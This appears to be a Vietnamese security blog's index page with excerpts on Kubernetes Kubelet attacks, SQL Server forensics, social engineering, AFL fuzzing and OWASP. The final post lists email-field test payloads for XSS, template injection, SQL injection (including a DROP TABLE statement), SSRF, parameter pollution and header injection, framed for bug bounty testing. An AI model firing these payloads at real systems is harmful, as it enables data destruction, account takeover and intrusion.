Tấn công các cụm Kubernetes qua lỗi API Kubelet misconfigure

Giới thiệu Kubelet là một agent trong từng node, có tác dụng quản lý tất cả container. Kubelet được giám sát, điều khiển bởi Control plane (hay còn gọi là Master), dùng để quản lý các node và các pod trong cluster. Ôn lại các kiến thức của Kubernetes, ta sẽ có một số kháiContinue reading “Tấn công các cụm Kubernetes qua lỗi API Kubelet misconfigure”

MSSQL Database Forensic (SQL Server)

GIỚI THIỆU Lợi ích của điều tra số Database nói chung: DML và DDL là gì? DDL là viết tắt của Ngôn Ngữ Định Nghĩa Dữ Liệu và do vậy có thể nói câu lệnh DDL được dùng để định hình dữ liệu của bạn trông như thế nào, tổ chức ra sao. Một số câuContinue reading “MSSQL Database Forensic (SQL Server)”

Tấn công Social Engineering toàn tập [part 2]

Phân loại Social Engineering Social Engineering có thể được chia thành hai loại phổ biến: Human-Based Social Engineering Human-based là kỹ thuật Social Engineering liên quan đến sự tương tác giữa con người với con người để thu được thông tin mong muốn. Ví dụ như chúng ta phải gọi điện thoại đến phòng HelpContinue reading “Tấn công Social Engineering toàn tập [part 2]”

Tấn công Social Engineering toàn tập [part 1]

Giới thiệu Trên thế giới, khi nói về vấn đề bảo mật thông tin, người ta không thể không nói đến Social Engineering – một kỹ thuật khai thác thông tin rất nguy hiểm, khó phát hiện, phòng chống và gây thiệt hại to lớn cho công tác bảo mật thông tin. Ngày nay, côngContinue reading “Tấn công Social Engineering toàn tập [part 1]”

FUZZING VỚI AFL

Giới thiệu American Fuzzy Lop, được viết tắt là AFL là một công cụ kiểm thử mờ thông minh. Được dùng để tìm các lỗ hổng phần mềm bằng cách gửi dữ liệu đầu vào có định đạng sai tới ứng dụng. Nếu phần mềm crash hoặc hoạt động không đúng dự kiến, nó cóContinue reading “FUZZING VỚI AFL”

Tóm tắt OWASP

OWASP Top 10 là một tài liệu tiêu chuẩn nâng cao nhận thức cho các developer và các nhà bảo mật. Hàng năm, tổ chức OWASP sẽ đi thu thập các thông tin về số lượng các loại lỗ hổng được khai thác nhiều nhất trên thế giới, và tổng hợp lại thành bộ OWASPContinue reading “Tóm tắt OWASP”

[Bug Bounty]Một số payload khi test trường email

Chép lại cho các ông copy nhé, nhất các ông :v XSS test+(alert(0))@example.comtest@example(alert(0)).com“alert(0)”@example.com Template injection “<%=7*7%>”@example.comtest+(${{7*7}})@example.com SQLi “‘OR1=1–‘”@example.com“mail’);DROP TABLE users;–“@example.com SSRF john.doe@abc123.burpcollaborator.netjohn.doe@[127.0.0.1] Parameter pollution victim&email=attacker@example.com (Email) Header injection “%0d%0aContent-Length:%200%0d%0a%0d%0a”@example.com“recicpient@test.com>\r\nRCPT TO:<victim+”@test.com